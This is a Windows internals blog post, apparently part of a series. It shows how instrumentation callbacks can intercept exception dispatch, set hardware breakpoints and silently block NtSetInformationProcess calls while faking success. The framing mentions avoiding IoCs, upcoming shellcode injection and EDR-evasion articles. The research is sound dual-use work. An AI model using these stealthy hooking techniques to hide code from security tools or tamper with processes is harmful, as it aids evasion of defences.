The process goes as follows: when an exception is thrown, a switch to kernel mode occurs, and the kernel places an EXCEPTION_RECORD and a CONTEXT structure describing the exception on the user-mode stack. The kernel then returns to user mode, where one VEH after another is executed until one of them returns EXCEPTION_CONTINUE_EXECUTION. If none of the VEHs handles the exception, dispatching continues with the frame-based (SEH) handlers, and if the exception remains unhandled, the process is terminated.

The exception handling works based on a first-come, first-served principle: if a VEH in the linked list responds with EXCEPTION_CONTINUE_EXECUTION, the VEHs contained in the linked list after the executed VEH will no longer be executed.
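The ordering rules described above can be illustrated with a toy model of the handler list. VehList is hypothetical and much simpler than the real list in ntdll; only the semantics of First and the values of EXCEPTION_CONTINUE_EXECUTION (-1) and EXCEPTION_CONTINUE_SEARCH (0) are taken from the documented API.

```cpp
#include <cassert>
#include <functional>
#include <list>
#include <utility>

// Local stand-ins for the documented return codes.
constexpr long kContinueExecution = -1;  // EXCEPTION_CONTINUE_EXECUTION
constexpr long kContinueSearch = 0;      // EXCEPTION_CONTINUE_SEARCH

// Toy model of the VEH list; handlers take no arguments here for brevity.
struct VehList {
    std::list<std::function<long()>> handlers;

    // Mirrors the `First` parameter of AddVectoredExceptionHandler.
    void add(unsigned long first, std::function<long()> handler) {
        if (first != 0)
            handlers.push_front(std::move(handler));
        else
            handlers.push_back(std::move(handler));
    }

    // Calls handlers in list order until one returns kContinueExecution.
    bool dispatch() const {
        for (const auto& handler : handlers)
            if (handler() == kContinueExecution)
                return true;  // handlers further down the list are never called
        return false;         // real dispatching would move on to SEH handlers
    }
};
```

Registering a handler with a non-zero First value therefore puts it ahead of all previously registered handlers, but any handler registered later with a non-zero First value can still preempt it.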

There are ways to avoid calling AddVectoredExceptionHandler to register a VEH, for example by manually locating and manipulating said linked list. However, the same problems and IoCs remain:

  • Our own VEH needs to be part of the linked list.
  • All VEHs before our own VEH in the linked list are executed and can handle the exception first.

Wouldn’t it be nice if we could handle exceptions without adding our exception handler to the linked list while also guaranteeing that our exception handler is executed before any other exception handlers? Or without even calling the other exception handlers at all?

If you read the first part of the series carefully, you might’ve already guessed where this is going: if an exception causes a switch to kernel mode, which then returns to user mode, can we intercept that return to user mode with our IC?

How convenient that we also created a PoC to log syscall names in the first part. Why don’t we just try using that PoC to see if something shows up when an exception is thrown?

KiUserExceptionDispatch

When an exception is thrown, the kernel returns to user mode at the KiUserExceptionDispatch function in ntdll. Because the kernel returns here, we suspect that this function calls the registered exception handlers somewhere down the road. Let’s check this theory by opening ntdll!KiUserExceptionDispatch in a decompiler. Luckily, figuring out what the function does is simple thanks to the function names provided by Microsoft:

+0x00    void KiUserExceptionDispatch() __noreturn
+0x00    {
+0x00        int64_t Wow64PrepareForException_1 = Wow64PrepareForException;
+0x0b        void arg_4f0;
+0x0b      
+0x0b        if (Wow64PrepareForException_1)
+0x1a            Wow64PrepareForException_1(&arg_4f0, &__return_addr);
+0x1a      
+0x29        char rax;
+0x29        int64_t r8;
+0x29        rax = RtlDispatchException(&arg_4f0, &__return_addr);
+0x30        int32_t rax_1;
+0x30      
+0x30        if (!rax)
+0x30        {
+0x4b            r8 = 0;
+0x4e            rax_1 = NtRaiseException();
+0x30        }
+0x30        else
+0x37            rax_1 = RtlGuardRestoreContext(&__return_addr, nullptr);
+0x37      
+0x55        RtlRaiseStatus(rax_1);
+0x55        /* no return */
+0x00    }

We can ignore the Wow64 functions because we are only focussing on ICs in non-Wow64 processes as mentioned in the disclaimer.

The code after the Wow64 functions looks interesting; RtlDispatchException is called with two parameters. The parameter names were auto-generated by BinaryNinja.

If we look at the disassembly of the function, we can see that both parameters used for calling RtlDispatchException are taken from the stack. This is also why BinaryNinja named the second parameter __return_addr: the address is on top of the stack, where the return address normally is.

Further down the decompiled snippet, we see a call to RtlGuardRestoreContext. This function is not documented on MSDN; however, RtlRestoreContext is. If we peek into RtlGuardRestoreContext with a disassembler/decompiler, we can see it’s just a wrapper around RtlRestoreContext with some sanity checks. According to the documentation, RtlRestoreContext takes a pointer to a CONTEXT structure and an optional second pointer to an _EXCEPTION_RECORD structure. So, the parameter named __return_addr by BinaryNinja is a pointer to the CONTEXT structure of the exception.

Theoretically, this would already suffice for some basic hooks, but let’s also get access to the other member of the EXCEPTION_POINTERS structure: the EXCEPTION_RECORD. If __return_addr is the CONTEXT structure, the first argument is likely the EXCEPTION_RECORD structure, as it is also retrieved from the stack that the kernel set up for user-mode exception handling. Instead of overcomplicating things with further static analysis, we can write a program that uses a VEH and attach a debugger to it. For this, I’ll use the following program, which registers a VEH and then performs a null pointer dereference to cause an exception:

#include "Windows.h"
long exception_handler(EXCEPTION_POINTERS* exception_info) {
   return EXCEPTION_CONTINUE_SEARCH;
}
int main()
{
   AddVectoredExceptionHandler(1, &exception_handler);
   bool* test = nullptr;
   *test = true;
   return 0;
}

Following the compilation, the program was opened in the debugger WinDbg.

First, breakpoints were set on both the exception handler and the call to RtlDispatchException inside KiUserExceptionDispatch, as RtlDispatchException takes the pointer to the CONTEXT structure and another parameter that might be a pointer to the EXCEPTION_RECORD structure.

0:000> bp ntdll!KiUserExceptionDispatch+0x29
0:000> bp exception_handler

After resuming execution, the breakpoint in KiUserExceptionDispatch is hit first, as expected. When it triggers, we read out rcx and rdx, because according to the Windows x64 calling convention, these registers hold the first and second function parameters.

Breakpoint 0 hit
ntdll!KiUserExceptionDispatch+0x29:
00007ffe`2f571439 e8d20efbff      call    ntdll!RtlDispatchException (00007ffe`2f522310)
0:000> r rcx
rcx=0000003d38affa30
0:000> r rdx
rdx=0000003d38aff540

Now, we need to cross-reference these values with the values of the EXCEPTION_POINTERS structure that is passed to the exception handler. This can easily be done with a handy feature of WinDbg: the display type command (dt).

0:000> g
Breakpoint 1 hit
veh_hooking_test!exception_handler:
00007ff7`30c41000 50              push    rax
0:000> dt EXCEPTION_POINTERS @rcx
veh_hooking_test!EXCEPTION_POINTERS
   +0x000 ExceptionRecord  : 0x0000003d`38affa30 _EXCEPTION_RECORD
   +0x008 ContextRecord    : 0x0000003d`38aff540 _CONTEXT

As you can see, our assumption was correct: the parameters passed to RtlDispatchException are pointers to the EXCEPTION_RECORD and CONTEXT structures. As the decompiled code showed, KiUserExceptionDispatch then calls RtlGuardRestoreContext on the CONTEXT structure if RtlDispatchException succeeded.

RtlRestoreContext, the function internally called by RtlGuardRestoreContext, sets the registers of the calling thread to the values in the CONTEXT structure passed to it. This means that rip, the instruction pointer, is also overwritten, so code after the call to RtlRestoreContext is never executed. This also means that if the C++ function (named instrumentation_callback in the previous blog post) calls RtlRestoreContext, it won’t return to your assembly bridge, so nothing after the C++ function call in the bridge is executed. The IC flag will thus never be reset.

IC exception handling

We now know how we can get access to the EXCEPTION_RECORD and CONTEXT structures and know how KiUserExceptionDispatch resumes execution – with RtlGuardRestoreContext.

All we now need to do is get our IC to intercept KiUserExceptionDispatch, retrieve the EXCEPTION_RECORD and CONTEXT off the stack and resume execution if we want to handle the exception.

We will reuse the same assembly bridge as in the first part of this blog series.

For now, let’s not add hooking but instead create a regular exception handler that continues execution after an access violation. For this, a modified version of the code snippet previously used for debugging will be used. The following snippet adds a regular exception handler that returns EXCEPTION_CONTINUE_EXECUTION, which means that the exception was handled, and that the execution of the program can continue:

#include "Windows.h"
#include "print"
long exception_handler(EXCEPTION_POINTERS* exception_info) {
   exception_info->ContextRecord->Rip += 3;
   return EXCEPTION_CONTINUE_EXECUTION;
}
int main()
{
   AddVectoredExceptionHandler(1, &exception_handler);
   bool* test = nullptr;
   *test = true;
   std::println("Access violation skipped");
   return 0;
}

You might wonder why we are adding a hardcoded value of 3 to the rip value saved in the CONTEXT record. This skips the faulting instruction at the line *test = true, which our compiler translated to the bytes c6 00 01 (mov byte ptr [rax], 1). Skipping these 3 bytes prevents the exception from being triggered again once execution continues.

In non-test code you would not want to do this, as a different compiler or the same compiler with different settings could also produce other instructions to perform the same logic. Normally, you would want to use a disassembler such as Zydis to disassemble the instruction rip points to, to dynamically calculate the length of the instruction. We decided against this to keep the snippet code as minimal as possible.

Let’s now remove the AddVectoredExceptionHandler line and try to replace it with an IC.

First, register an IC using the same logic/code as in the first part of this series. In this part, we will only cover changes to the instrumentation_callback function, as the rest remains the same as in the first blog post.

The following IC can be used to execute the same exception handler that would’ve been called if you added it with AddVectoredExceptionHandler. The code for the function is simple; if you’ve understood the blog posts so far you shouldn’t have a problem understanding it. The only part that was not covered was the offset of 0x4f0 from rsp to get the EXCEPTION_RECORD*. This comes from KiUserExceptionDispatch. We only showed the decompiled version of the code, which of course does not contain the stack offsets. If you disassembled that function and looked at the function call to RtlDispatchException, you would see the 0x4f0 offset.

You might also notice that we are using KiUserExceptionDispatcher instead of KiUserExceptionDispatch with GetProcAddress. That is because the function is exported as KiUserExceptionDispatcher.

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
static uint64_t user_exception_addr = 0;
if (!user_exception_addr) {
   user_exception_addr = reinterpret_cast<uint64_t>(GetProcAddress(GetModuleHandleA("ntdll.dll"), "KiUserExceptionDispatcher"));
}
if (return_addr != user_exception_addr)
   return return_val;
EXCEPTION_POINTERS exception_pointers = {};
exception_pointers.ContextRecord = reinterpret_cast<CONTEXT*>(original_rsp);
exception_pointers.ExceptionRecord = reinterpret_cast<EXCEPTION_RECORD*>(original_rsp + 0x4f0);
auto exception_status = exception_handler(&exception_pointers);
if (exception_status == EXCEPTION_CONTINUE_SEARCH)
   return return_val;
RtlRestoreContext(exception_pointers.ContextRecord, nullptr);
// This will never be reached if RtlRestoreContext executes successfully
return return_val;
}

With this code, the Windows exception handlers are never executed if our own exception handler returns EXCEPTION_CONTINUE_EXECUTION, as the code restores the context before the regular exception handlers are even called.

Hooking with ICs

Skipping access violations is cool, but it’s not very useful compared to what else we can do with an exception handler. So, let’s return to the main topic of this blog post: how to hook code with ICs. For this, we will create an imaginary scenario: we have installed an IC and want to prevent someone else from overwriting or removing it. This only works within the same process, because ICs (and our hooks) are process-local: a different process can still overwrite the IC remotely if it has the necessary privilege (SeDebugPrivilege).

We’ve touched on hardware breakpoints and debug registers before, but we haven’t set any yet. We mentioned that hardware breakpoints are set via CPU registers, the debug registers. This means they are thread-specific: they only trigger in the thread for which they were set. To cover the entire process, the hardware breakpoints need to be set for every thread, including threads that are created later.

Setting hardware breakpoints

To use hardware breakpoints, we first need to set the debug registers accordingly.

For this purpose, we created a function with the following function definition:

bool set_hwbp(debug_register_t reg, void* hook_addr, bp_type_t type, uint8_t len)

The definitions for the two custom enums debug_register_t and bp_type_t look as follows:

enum class debug_register_t {
Dr0 = 0,
Dr1,
Dr2,
Dr3
};
enum class bp_type_t {
Execute = 0b00,
Write = 0b01,
ReadWrite = 0b11
};

These are not mandatory; however, we use them to make our intentions clearer instead of directly requiring numbers or bit literals to be passed. As mentioned before, there are four debug registers that can contain the address of a breakpoint. Each of them has its own options in Dr7, which allows execute, write, and read/write breakpoints (x86 has no read-only data breakpoint condition).

Now Dr7, the control register, needs to be set accordingly.

OSDev wiki has a table explaining the structure of Dr7:

Figure 1: https://wiki.osdev.org/CPU_Registers_x86#Debug_Registers

For each hardware breakpoint we want to set, we need to do four things:

  1. Set Dr0/1/2/3 to the address.
  2. Enable the corresponding local breakpoint for the passed debug_register_t (bit 0, 2, 4 or 6 of Dr7).
  3. Set the correct condition based on the passed bp_type_t.
  4. Set the correct size for the breakpoint. For execute breakpoints, it always needs to be 0.

Step 1 can be done using the following code:

bool set_hwbp(debug_register_t reg, void* hook_addr, bp_type_t type, uint8_t len) {
CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
if (!GetThreadContext(GetCurrentThread(), &context))
   return false;
if (reg == debug_register_t::Dr0)
   context.Dr0 = reinterpret_cast<DWORD64>(hook_addr);
else if (reg == debug_register_t::Dr1)
   context.Dr1 = reinterpret_cast<DWORD64>(hook_addr);
else if (reg == debug_register_t::Dr2)
   context.Dr2 = reinterpret_cast<DWORD64>(hook_addr);
else
   context.Dr3 = reinterpret_cast<DWORD64>(hook_addr);

As the debug registers can’t be directly modified from user mode, we need to use the corresponding Windows APIs (GetThreadContext and SetThreadContext). We then set Dr0/1/2/3 to the hook address.

The remaining steps are a bit more complicated, as they require bitwise operations on Dr7, and the bit positions depend on the chosen debug register.

For brevity’s sake, we added comments to the specific passages instead of explaining it via text:

[…]
// Converts the enum to its underlying type to use it for calculations
auto reg_index = std::to_underlying(reg);
// Enables the local breakpoint (bit position 0/2/4/6)
context.Dr7 |= 1ULL << (reg_index * 2);
// Clear and set the condition (execute/write/read and write)
context.Dr7 &= ~(0b11ULL << (16 + reg_index * 4));
context.Dr7 |= static_cast<DWORD64>(std::to_underlying(type)) << (16 + reg_index * 4);
// Execution breakpoints always require the length to be 0
if (type == bp_type_t::Execute)
   len = 0;
// Clear and set the length; widening before the shift keeps a LEN of 0b10 or 0b11
// for Dr3 (bits 30-31) from being sign-extended into the upper half of Dr7
context.Dr7 &= ~(0b11ULL << (18 + reg_index * 4));
context.Dr7 |= static_cast<DWORD64>(len & 0b11) << (18 + reg_index * 4);
return SetThreadContext(GetCurrentThread(), &context);
}
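Because Dr7 is just a 64-bit value, the bit arithmetic above can be checked without touching any thread context. The following is a minimal, portable sketch that restates the Dr7 part of set_hwbp as a constexpr function; the name encode_dr7 is our own and not part of any API, and len is assumed to be the raw 2-bit LEN encoding (0b00 = 1 byte, 0b01 = 2 bytes, 0b11 = 4 bytes, 0b10 = 8 bytes).

```cpp
#include <cstdint>

// Same enums as in the article
enum class debug_register_t { Dr0 = 0, Dr1, Dr2, Dr3 };
enum class bp_type_t { Execute = 0b00, Write = 0b01, ReadWrite = 0b11 };

// Hypothetical helper: returns 'dr7' with breakpoint 'reg' enabled locally and its
// R/W and LEN fields replaced. 'len' is the raw 2-bit LEN encoding.
constexpr std::uint64_t encode_dr7(std::uint64_t dr7, debug_register_t reg, bp_type_t type, std::uint8_t len) {
    const unsigned index = static_cast<unsigned>(reg);
    const unsigned rw_shift = 16 + index * 4;   // R/W0..R/W3 at bits 16-17, 20-21, 24-25, 28-29
    const unsigned len_shift = 18 + index * 4;  // LEN0..LEN3 at bits 18-19, 22-23, 26-27, 30-31

    if (type == bp_type_t::Execute)
        len = 0;                                // execute breakpoints require LEN = 0

    dr7 |= 1ULL << (index * 2);                 // L0..L3 at bits 0, 2, 4, 6
    dr7 &= ~(0b11ULL << rw_shift);              // clear the old condition
    dr7 |= static_cast<std::uint64_t>(type) << rw_shift;
    dr7 &= ~(0b11ULL << len_shift);             // clear the old length
    dr7 |= static_cast<std::uint64_t>(len & 0b11) << len_shift;  // widen before shifting
    return dr7;
}
```

For example, a 4-byte write breakpoint in Dr1 yields 0xD00004: bit 2 enables it, 0b01 at bits 20–21 selects "write" and 0b11 at bits 22–23 selects 4 bytes.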

Now we’ve got everything set up to install a hardware breakpoint. The following snippet can be added to your main function to install a breakpoint on function calls to NtSetInformationProcess:

set_hwbp(debug_register_t::Dr0, nt_set_info_proc, bp_type_t::Execute, 0);

This should crash your program if you call the specified function and have no exception handler that handles the exception.

Modifying the exception handler

Now we only need to make the exception handler handle the exception caused by the hardware breakpoint. For this, we don’t need to touch the IC as it already correctly calls the exception handler; instead, we need to modify the function exception_handler.

First, we need to detect whether the exception was caused by one of the debug registers. For execute breakpoints, this could easily be done by comparing rip with the breakpoint address; however, we also want compatibility with write and read/write breakpoints. These are reported after the accessing instruction has executed, so rip then holds the address of the following instruction, not the address stored in the debug register. Instead of checking rip, we can use Dr6, the debug status register: when a breakpoint triggers, bits 0–3 of Dr6 indicate which debug register’s condition was met. For example, when the breakpoint in Dr2 triggers, bit 2 is set.

The debug registers are conveniently included in the ContextRecord member of the EXCEPTION_POINTERS structure passed to VEH handlers. This means we don’t need to call GetThreadContext again to retrieve them.

Here is an example of how to check which debug register fired:

long exception_handler(EXCEPTION_POINTERS* exception_info) {
if (exception_info->ContextRecord->Dr6 & 1)
   std::println("Dr0 fired");
else if (exception_info->ContextRecord->Dr6 & 2)
   std::println("Dr1 fired");
else if (exception_info->ContextRecord->Dr6 & 4)
   std::println("Dr2 fired");
else if (exception_info->ContextRecord->Dr6 & 8)
   std::println("Dr3 fired");
[…]
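The if/else chain above can also be written as a small helper that returns the index of the debug register that fired. The following portable sketch (fired_debug_register is a hypothetical name) checks bits 0–3 of a Dr6 value in the same order as the chain and returns -1 when none of them is set, for example when only the single-step bit (BS, bit 14) is set.

```cpp
#include <cstdint>

// Returns the index (0-3) of the lowest debug register flagged in Dr6 (bits B0-B3),
// or -1 if none of these bits is set
constexpr int fired_debug_register(std::uint64_t dr6) {
    for (int index = 0; index < 4; ++index) {
        if (dr6 & (1ULL << index))
            return index;
    }
    return -1;
}
```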

Before implementing the actual logic that prevents someone from overwriting an IC, we need to fix the error you’ve most likely run into if you tried testing that code: the exception keeps firing until the program eventually crashes.

The solution for this is the resume flag (RF), a bit in the RFLAGS register. The AMD manual explains it as follows: “[…] The RF bit, when set to 1, temporarily disables instruction breakpoint reporting to prevent repeated debug exceptions (#DB) from occurring. […]”. So, all we need to do is set the resume flag, which is bit 16 of RFLAGS. The CONTEXT structure only exposes EFlags, i.e. the lower 32 bits of RFLAGS; since the upper 32 bits are reserved, this is sufficient, and the resume flag can be set as follows:

exception_info->ContextRecord->EFlags |= 1 << 16;

After adding that, the code can continue execution even after a hardware breakpoint was triggered.
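As a quick sanity check of the bit arithmetic, the following portable sketch (with hypothetical names) sets the resume flag on an EFlags value; it also shows that bit 16 lies within the 32 bits covered by the EFlags member.

```cpp
#include <cstdint>

// RF (resume flag) is bit 16 of RFLAGS and therefore also of the 32-bit EFlags value
constexpr std::uint32_t resume_flag = 1u << 16;

// Returns EFlags with RF set, so the instruction at rip can execute once without
// the execute breakpoint on it firing again
constexpr std::uint32_t with_resume_flag(std::uint32_t eflags) {
    return eflags | resume_flag;
}
```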

Forbidding IC registration

We’ve covered everything that’s needed to prevent anyone from registering a new IC. The following exception handler only handles a hardware breakpoint set in Dr0. It then performs the NtSetInformationProcess-specific actions: first, we check whether 0x28, the ProcessInformationClass value required to install an IC, is passed in rdx (the second parameter), or whether NtSetInformationProcess is being called for something other than registering an IC. If a new IC should get installed, its address is read from the structure passed in r8 (the third parameter) and printed. Afterwards, rax, the register that holds the return value, is set to 0 (STATUS_SUCCESS) to make the call appear successful. We then set rip to the address of a ret instruction (ret_operation_addr in the code below, which has to point to any ret instruction in executable memory), so NtSetInformationProcess isn’t executed: since the breakpoint fires on the first instruction of the function, the return address is still on top of the stack, and the ret returns straight to the caller. You could also set up the return manually, meaning adjusting the stack and loading the return address into rip yourself.

long exception_handler(EXCEPTION_POINTERS* exception_info) {
if (!(exception_info->ContextRecord->Dr6 & 1))
   return EXCEPTION_CONTINUE_SEARCH;
exception_info->ContextRecord->EFlags |= 1 << 16;
// Does the call even want to overwrite the IC?
if (exception_info->ContextRecord->Rdx != 0x28)
   return EXCEPTION_CONTINUE_EXECUTION;
const auto instrumentation_info = reinterpret_cast<PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION*>(exception_info->ContextRecord->R8);
std::println("Following IC was going to get set: {}", instrumentation_info->Callback);
// Success
exception_info->ContextRecord->Rax = 0;
exception_info->ContextRecord->Rip = reinterpret_cast<DWORD64>(ret_operation_addr);
return EXCEPTION_CONTINUE_EXECUTION;
}

If you install your own IC with an exception handler, register a hardware breakpoint on NtSetInformationProcess and then try to register another IC, you will see the prints from your own exception handler, which show that the IC registration was blocked. You can verify that your IC wasn’t overwritten by trying to register a new IC multiple times: if the prints still show up, your IC is still active.

Closing words

In this blog you learned how to do very basic hooking with ICs, but this is by no means all you can do with ICs in terms of hooking. The benefit of the chosen design, i.e. your IC calling an exception handler with a populated EXCEPTION_POINTERS structure, is that it is compatible with the regular format of exception handlers required for VEH. Anything you can get to work with VEH you can get to work with the IC implementation of it, with the main benefit being that no other exception handlers are called, as the regular VEH dispatching is skipped entirely.

You could, for example, also hook data reads and writes by changing the hardware breakpoint options. You can also get PAGE_GUARD hooks to work, as they also throw exceptions.

We recommend keeping the restrictions of hardware breakpoints in mind, especially with multi-threaded programs.

Instead of simply blocking NtSetInformationProcess calls that want to register new ICs, you could block the call and then invoke the IC that was supposed to be set from within your own IC. The user or program that tried registering the IC would then think it was successfully added, while your IC stays in place and can filter what is passed to the other IC.

It is also possible to pass through calls to hooked functions from within your hook, but you need to disable the hardware breakpoints or pass through the exceptions to make it work as normal.

A little hint: think about the restrictions of using a flag to enable and disable your IC – what happens if someone sets a hardware breakpoint in your IC?

In the next part of this series, you will learn how you can use ICs to inject shellcode into other processes. After that, in the last part of this series, we will look at ICs from a more theoretical standpoint: what is possible with them, what isn’t and how can programs detect if an IC is set.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Reverse Engineering

Windows Instrumentation Callbacks – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann


Windows Instrumentation Callbacks – Part 1

November 5, 2025


Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

In the first part of the blog, you will learn how ICs are implemented and how you can use them to log and spoof syscalls without setting any hooks.

In the second part, you will learn how to use ICs for patchless hooking without registering or executing any exception handlers.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This blog post will teach you how to set ICs on Windows 10 and 11; for older Windows versions, the API for setting an IC is different.
  • This series is aimed at x64 programs. We will not be discussing setting instrumentation callbacks on WoW64 processes, i.e. processes running through the x86 compatibility layer.

Credits

This blog post is based on the research of multiple people, most notably Alex Ionescu and his Hooking Nirvana presentation at Recon 2015. We recommend watching that presentation as he also shows other interesting hooking techniques.

dx9’s blog post about Hyperion (an anti-cheat) and wave (a cheat), which both utilize instrumentation callbacks, was also very informative.

Additionally, we want to thank ph3r0x for telling us about ICs and about the differences in WoW64 processes.

What are instrumentation callbacks?

A callback is a function that is passed to another function which then executes the callback function at a certain event or condition.

Instrumentation refers to the process of modifying a program to allow analysis of it.

In simple terms, an instrumentation callback instruments a program so that the specified callback function is executed on kernel-to-user-mode returns. According to Alex Ionescu, instrumentation callbacks are used by Microsoft in internal tools such as iDNA, which is apparently used for time travel tracing and for TruScan. We cannot confirm that; however, there is a mention of iDNA and TruScan in this Microsoft research paper.

A more thorough explanation of the inner workings of instrumentation callbacks is as follows: an IC is a process-specific user-mode callback for system traps, for example syscalls or exceptions like access violations. Once a trap is triggered, a switch to kernel mode occurs to handle the trap. If an IC is set, the kernel returns to the IC instead of the original return point. This means the IC is the first code executed in user mode after the trap was handled. The IC is therefore also responsible for continuing the program flow at the original return point, as otherwise the interrupted code would never resume and the program would crash or hang. For this purpose, the kernel passes the original return point in a CPU register, as we will find out by reversing later.

For visualization, let’s trace the flow of a typical Windows API call. Please note that the kernel part of this diagram is by no means complete; the diagram is meant to show the execution flow with and without an instrumentation callback; it’s not meant to teach you the inner workings of the kernel. If that interests you, we recommend the explanation of the Windows syscall handler by hammertux.

Figure 1: Exemplary OpenProcess call without IC

With an IC set, this flow would look as follows:

Figure 2: Exemplary OpenProcess call with IC

You might be wondering why we are jumping to r10. We will get to that in the next chapter.

example.exe refers to the memory region of that process; the IC does not need to be a part of the original program’s binary; it can be added dynamically at runtime.

Looking at that diagram, it might become more obvious how powerful ICs are. The kernel returns right to our code, before even the ret instruction after the syscall is executed: our IC is the first code to be executed after the kernel returns to user mode. We will discuss what can be done with that later. Let’s first check out how the IC is handled by the kernel.

Reversing

KiSetupForInstrumentationReturn

ntoskrnl.exe includes a function called KiSetupForInstrumentationReturn. Let’s check out what this function does; as one could guess by the name, it has something to do with ICs. 

mov rax, qword [gs:0x188]
mov rdx, qword [rax+0xb8]
mov r8, qword [rdx+0x3d8]
test r8, r8
jne 0x140482a86
retn

Let’s go through this step by step.

Line 1: In kernel mode, the gs segment base points to the Kernel Processor Control Region (KPCR) structure. At offset 0x180 of that structure, a member structure called Kernel Processor Control Block (KPRCB) is located. So, by accessing gs:0x188, we access the KPRCB member at offset 8, which is the CurrentThread member of type KTHREAD*. It is dereferenced, so after the first operation, rax holds the address of the current thread’s KTHREAD structure.

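Line 2: This operation loads the address of the current process’s KPROCESS structure into rdx. This might not seem to fit the KTHREAD structure definition mentioned before, as offset 0xb8 lies inside the embedded ApcState member (it is its Process field); however, if we disassemble PsGetCurrentProcess, we will see the same operations.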

Lines 3–6: At offset 0x3d8 of the KPROCESS structure, the InstrumentationCallback member is located. It is moved into r8 and tested for null. If it is null, the function returns; as rax still holds the address of the current thread’s KTHREAD structure, this is what the function returns.
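To make the pointer chase of lines 1–3 concrete, the following portable sketch replays it on fake memory buffers instead of real kernel structures. The offsets are the ones described above for the analysed build and may differ between Windows builds; read_qword and read_instrumentation_callback are hypothetical helpers.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Offsets as described above for the analysed x64 build; other Windows builds may differ
constexpr std::uint32_t kpcr_prcb_offset = 0x180;          // KPCR.Prcb (embedded KPRCB)
constexpr std::uint32_t kprcb_current_thread_offset = 0x8; // KPRCB.CurrentThread
constexpr std::uint32_t kthread_process_offset = 0xb8;     // read by line 2 and PsGetCurrentProcess
constexpr std::uint32_t kprocess_ic_offset = 0x3d8;        // KPROCESS.InstrumentationCallback

static_assert(kpcr_prcb_offset + kprcb_current_thread_offset == 0x188, "gs:0x188 is KPRCB.CurrentThread");

// Equivalent of mov reg, qword [base+offset]
inline std::uint64_t read_qword(const unsigned char* base, std::uint32_t offset) {
    std::uint64_t value;
    std::memcpy(&value, base + offset, sizeof(value));
    return value;
}

// Models lines 1-3: KPCR -> current KTHREAD -> KPROCESS -> InstrumentationCallback
inline std::uint64_t read_instrumentation_callback(const unsigned char* kpcr) {
    assert(kpcr != nullptr);
    const auto* kthread = reinterpret_cast<const unsigned char*>(
        read_qword(kpcr, kpcr_prcb_offset + kprcb_current_thread_offset));
    const auto* kprocess = reinterpret_cast<const unsigned char*>(
        read_qword(kthread, kthread_process_offset));
    return read_qword(kprocess, kprocess_ic_offset);
}
```

A result of 0 corresponds to the test r8, r8 / retn path, i.e. no IC is set.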

The following disassembly gets executed if an IC is set:

cmp word [rcx+0x170], 0x33
jne 0x14036d228
mov rax, qword [rcx+0x168]
mov qword [rcx+0x58], rax
mov qword [rcx+0x168], r8
retn

Now the parameter passed to KiSetupForInstrumentationReturn in rcx is used: it’s the address of the base of the KTRAP_FRAME structure of the trap – you will just have to believe us on that one 😉

Lines 1–2: This check verifies that the trap didn’t originate from a WoW64 program by checking the SegCs member of KTRAP_FRAME. For 64-bit programs, it should equal 0x33; for programs executed through the WoW64 compatibility layer, it is most likely 0x23. We’d recommend checking out this blog article by Marcus Hutchins if you are interested in an explanation.

Lines 3–4: KTRAP_FRAME.r10 is set to KTRAP_FRAME.rip. To clarify, the register members of the trap frame hold the values the thread had when the trap occurred in user mode. This means KTRAP_FRAME.rip does not hold a kernel address but a user-mode one.

Line 5: KTRAP_FRAME.rip is set to KPROCESS.InstrumentationCallback, which was already moved into r8 before.
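The effect of the disassembly above can be summarized in a small, portable model. trap_frame is a simplified stand-in that only contains the three members the routine touches (it is not the real KTRAP_FRAME layout), and since we did not analyse the jne target, the sketch assumes that a SegCs other than 0x33 simply leaves the frame unchanged.

```cpp
#include <cstdint>

// Simplified stand-in holding only the KTRAP_FRAME members the routine touches
// (not the real structure layout)
struct trap_frame {
    std::uint16_t seg_cs;  // code segment of the interrupted user-mode code
    std::uint64_t rip;     // user-mode address the kernel will return to
    std::uint64_t r10;     // user-mode r10 restored on return
};

constexpr std::uint16_t native_x64_cs = 0x33;

// Models KiSetupForInstrumentationReturn for a given KPROCESS.InstrumentationCallback value.
// Assumption: the (unanalysed) jne branch for non-0x33 code segments leaves the frame unchanged.
constexpr trap_frame setup_for_instrumentation_return(trap_frame frame, std::uint64_t instrumentation_callback) {
    if (instrumentation_callback == 0)
        return frame;                      // no IC set: return to the original rip
    if (frame.seg_cs != native_x64_cs)
        return frame;                      // WoW64 trap: no redirection in this model
    frame.r10 = frame.rip;                 // hand the original return point to the IC in r10
    frame.rip = instrumentation_callback;  // return into the IC instead
    return frame;
}
```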

Now we know that r10 will hold the actual instruction pointer and saw how the IC is implemented. By checking the cross-references to that function, the following functions show up: KiInitializeUserApc, KiDispatchException, KeRaiseUserException, KiRaiseException. Additionally, an unnamed function shows up. This gives us hints as to what we can catch with ICs.

We now know we somehow need to set KPROCESS.InstrumentationCallback; however, this is obviously a kernel structure, which we can’t directly set from user mode.

NtSetInformationProcess

Of course there is a function to set KPROCESS.InstrumentationCallback from user mode, as otherwise this blog post would not exist. As mentioned before, we did not reverse ntoskrnl ourselves to find this function; that credit goes to Alex Ionescu.

